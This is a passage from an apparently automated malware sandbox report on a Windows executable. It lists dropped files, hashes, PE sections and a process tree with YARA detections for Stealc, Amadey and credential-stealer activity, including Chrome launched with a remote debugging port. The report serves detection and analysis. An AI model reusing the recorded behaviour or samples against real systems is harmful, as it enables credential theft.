                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                    Entropy (8bit):3.982718430529963
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:8nhd8TUtJHHfidAKZdA17ehBiZUk1W1qeh9y+C:8ngce9dy
                                                                                                                                                                                                                                                    MD5:32584F4FB55F817EF0E27A5014F91190
                                                                                                                                                                                                                                                    SHA1:7A9C2819AED2400D33B9C936A1E75BEF49C24F86
                                                                                                                                                                                                                                                    SHA-256:F79B238D426FD29AC262B62D25145678E2C6F347C9DC9451E8D23A9968296090
                                                                                                                                                                                                                                                    SHA-512:BE3F4BC7607BD8D673E3445BB392D6EC8637A0094E97B67E31A3FD8C0244590983B0DC59F52BB78ECB5FCE8B04AE5F25EB297FC445EFD6C305BDDA706CD24538
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....|.=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                    Entropy (8bit):3.988594387957611
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:8dhd8TUtJHHfidAKZdA1duTiehOuTbbiZUk5OjqehOuTbny+yT+:8dgc+TLTbxWOvTbny7T
                                                                                                                                                                                                                                                    MD5:543F8231056D277D8779C6A1B794AE89
                                                                                                                                                                                                                                                    SHA1:FB9214CDB729C3AD5A00AE97438C1B78155CDFD1
                                                                                                                                                                                                                                                    SHA-256:DADC88C070B284591DB31F9111DC132C56186B4A65DC6EA3E7CB284039C7A899
                                                                                                                                                                                                                                                    SHA-512:BD69C43C42A6E516C13D852482CD3079B46BD0CC90AF50D08B2F970914BA4BAE552CC22718DFCA08824E9DDCE16B3CE40B631F4ACB3AB03CF611D7BC17DA7A8F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......p=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3220480
                                                                                                                                                                                                                                                    Entropy (8bit):6.6558508778698835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:98304:InuGM5xECMK59cccgccctccOccccccccccYcccFCccccvcccyFcXccckc4cccccq:eM5xELKXcccgccctccOccccccccccYcS
                                                                                                                                                                                                                                                    MD5:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    SHA1:5A1993097306BF2AC08F4BC457DA97C797669989
                                                                                                                                                                                                                                                    SHA-256:7BD2D52A3DBD6ADFC7538319829BD471C1C9140709D8083A80A860EC2DEB93E1
                                                                                                                                                                                                                                                    SHA-512:A064F8E89FDEC590365B19B3265A69F2E764DAC4B3F1197A151F5BE9DC49E07A0AAD8F9ACACA3B2F2ACA7CAF403A744E46FEC84FE62E3D0FF99CE5DBC1D0CC3E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................01...........@..........................`1.....*"2...@.................................W...k...........................(.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...ykgekexw.p*......f*.................@...prmmqeqz..... 1.......0.............@....taggant.0...01.."....1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):284
                                                                                                                                                                                                                                                    Entropy (8bit):3.36310386342062
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:tVXflN0VzUEZ+lX1CGdKUe6tDsBZWVny0lbtSlEt0:tRfoQ1CGAFnv8VbUlEt0
                                                                                                                                                                                                                                                    MD5:7490B47151DF79EC36E50818C43C892D
                                                                                                                                                                                                                                                    SHA1:A087B40F12AD990E3879448A2E40534B1FE50EFF
                                                                                                                                                                                                                                                    SHA-256:A5144BA75F0F4D9B22A39660B4A602FC7704A329E8BDB97A8766BD8EF9CFB977
                                                                                                                                                                                                                                                    SHA-512:8AD1209C77D2948F8820E6621A8F037B28E3BC9622877EEDFB2660872744F03FF22979BF56A3B9465CC71282009E0148AE975729BA66F606F2DC1B3B2670E6CF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:.....z.....L.t$.....F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........T.O.T.T.I.-.P.C.\.t.o.t.t.i...................0.................+.@3P.........................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                    Entropy (8bit):7.989392691400588
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:tI05w/i0EgOp2bAntruwSB/n5FqAmHrnaNWQu2/O7pOuSLBLX:tI05w/i0Ed2buawK/qAmLGWx7pOLLBz
                                                                                                                                                                                                                                                    MD5:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                                                                                                                                                    SHA1:5BDF461219E68AA7175A5FA01962AF8E3F583C7E
                                                                                                                                                                                                                                                    SHA-256:F7846A193C00E22D512FDC71FCA6FB3F3AF434179681D26700B11B7F4E69AB64
                                                                                                                                                                                                                                                    SHA-512:BFB8DFA87AAF0DC9AFD3AE19C6082A53917501899F582DDC10A56A311B9504A64F25C1B923ABE0B5077CEF64F6EF891089358D652E4A7618DACA9418BAD03017
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg.............................$............@...........................;...........@................................. P-..............................P-.........................................................................................................................@............0... ......."..............@................P...2...0..............@............@...0...$...b..............@.............'..p......................@....data....P...P-..P...@..............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15
                                                                                                                                                                                                                                                    Entropy (8bit):3.906890595608518
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SXhRi75n:SC5
                                                                                                                                                                                                                                                    MD5:3A33AF4BC7DC9699EE324B91553C2B46
                                                                                                                                                                                                                                                    SHA1:4CCE2BF1011CA006FAAB23506A349173ACC40434
                                                                                                                                                                                                                                                    SHA-256:226D20C16ED4D8DDDFD00870E83E3B6EEDEDB86704A7BF43B5826B71D61500AE
                                                                                                                                                                                                                                                    SHA-512:960194C8B60C086520D1A76B94F52BA88AC2DDEC76A18B2D7ABF758FFFF138E9EDD23E62D4375A34072B42FBA51C6D186554B1AA71D60835EF1E18BEB8873B1D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:1.29548Enjoy!..
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):52
                                                                                                                                                                                                                                                    Entropy (8bit):4.259368622572871
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:RLgbWRthLK5a6eCMABR:RLgbWoJPh
                                                                                                                                                                                                                                                    MD5:299EBDC3FE95E747C8BBF59201D8B2D6
                                                                                                                                                                                                                                                    SHA1:DA2270E23AB6FFE5DA5E0A0D5482FAD0E8475CE9
                                                                                                                                                                                                                                                    SHA-256:4D8D8B138A4A51C410892DB0DCDAB046FB7C5B5149FC115A9F91070B35226C5A
                                                                                                                                                                                                                                                    SHA-512:274C996DF202D80A02CCA5C1F73D60FC7D15AAC2C77C5AD5A443721073FF8DF2111BDD832D990AA0E91A9E86E0303689E88871DE651FBB1237F12576362B94DF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:ERROR: The system cannot find the file specified....
                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):7.949414755762918
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:EdYEXasNiR.exe
                                                                                                                                                                                                                                                    File size:1'857'024 bytes
                                                                                                                                                                                                                                                    MD5:0be97a686bb58f470d1d096a12097fa8
                                                                                                                                                                                                                                                    SHA1:b35c19eb80c62bfae9ed4561165729bf96d3ea99
                                                                                                                                                                                                                                                    SHA256:02c7411fd491368727387ac793e3bb3fcd9b792f1a18cec7c0da5cd65cbccc72
                                                                                                                                                                                                                                                    SHA512:33d75500f68c9105538b055172ac4ba24d587739bb450ccd68fc975c8298995a6885c71b675e595b834b65caa13db0ee5f5356b98baae9bc8d1abf55ca7ef9cf
                                                                                                                                                                                                                                                    SSDEEP:24576:43BI7l6Ud0AOYP2m5DzS0ygKY6BFM6STj8MoI0U5Qhy2i6m0xInx48Ta3U+YpSw7:43BQ6JmZ+0yS6HnGo2uY6m0Kx48vSw
                                                                                                                                                                                                                                                    TLSH:CF8533A12C6171E3C8A04A75E2AF91CB7FFDD6D5C4046BBA8F09682D6463F16507BCE0
                                                                                                                                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I...........@.................................Y@..m..
                                                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                    Entrypoint:0x899000
                                                                                                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                    Time Stamp:0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                    Instruction
Name                                  Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x54059           0x6d           .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x53000           0x2b0          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0               0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x541f8           0x8            .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0               0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0               0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0               0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0               0x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    0x10000x520000x260006f0c8981bafafb75398e372c5e74fccdFalse0.9999421772203947data7.9828338445910125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .rsrc0x530000x2b00x400fe67bb2a9df3150b9c94de8bd81ed8a0False0.3603515625data5.186832724894366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    0x550000x2a70000x200e4607df23f92eac0c4180bc03287e711unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    ulqubmxb0x2fc0000x19c0000x19b800792ff492e0e23fcd75fc8a1815eeb29fFalse0.9950317531136087OpenPGP Secret Key7.955389523438137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    cfocvtil0x4980000x10000x400f28a105af91bce7331cd9982b15972b6False0.7861328125data6.111905796447916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .taggant0x4990000x30000x2200abd953d5a9100c89655717c2ab95255dFalse0.07456341911764706DOS executable (COM)0.8597840590916789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                    RT_MANIFEST0x530580x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                    kernel32.dlllstrcpy
                                                                                                                                                                                                                                                    Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:09:42:04
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\EdYEXasNiR.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\EdYEXasNiR.exe"
                                                                                                                                                                                                                                                    Imagebase:0xcd0000
                                                                                                                                                                                                                                                    File size:1'857'024 bytes
                                                                                                                                                                                                                                                    MD5 hash:0BE97A686BB58F470D1D096A12097FA8
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1600078469.0000000001915000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1601767639.0000000001918000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                    Start time:09:42:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe"
                                                                                                                                                                                                                                                    Imagebase:0xef0000
                                                                                                                                                                                                                                                    File size:5'206'016 bytes
                                                                                                                                                                                                                                                    MD5 hash:3F6AB8A7E543EE65455B7D923402EF58
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2212351037.0000000000EF1000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2212351037.0000000000FC4000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                    Start time:09:42:28
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe"
                                                                                                                                                                                                                                                    Imagebase:0xe70000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000005.00000002.1849269108.0000000000E71000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                    Start time:09:42:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                    Imagebase:0xf50000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.1915110312.0000000000F51000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                    Start time:09:42:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Imagebase:0xf50000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000002.1917695325.0000000000F51000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                    Start time:09:42:34
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                                                    Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                    Start time:09:42:36
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8
                                                                                                                                                                                                                                                    Imagebase:0x7ff6a3150000
                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                    MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
